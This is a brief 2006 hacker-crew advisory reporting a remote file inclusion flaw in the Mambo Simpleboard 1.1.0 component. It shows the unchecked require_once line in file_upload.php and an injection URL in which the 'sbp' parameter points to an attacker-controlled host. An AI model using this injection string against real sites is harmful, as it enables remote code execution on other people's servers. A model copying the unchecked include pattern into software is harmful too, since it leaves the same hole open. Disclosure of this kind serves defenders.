Rated as : Low Risk
Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew
Another Mambo component remote inclusion vulneribility
download :
http://mamboxchange.com/frs/download.php/6920/Simpleboard-1.1.0-Stable.zip
bug found in file file_upload.php :
require_once("$sbp/sb_helpers.php");
inject :
http://[site]/[path]/components/
components/com_simpleboard/file_upload.php?sbp=[attacker]
Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo,
and all #batamhacker [at] dalnet crew, #mardongan, #motha,
#papmahackerlink securitydot.net - 2006-07-09
|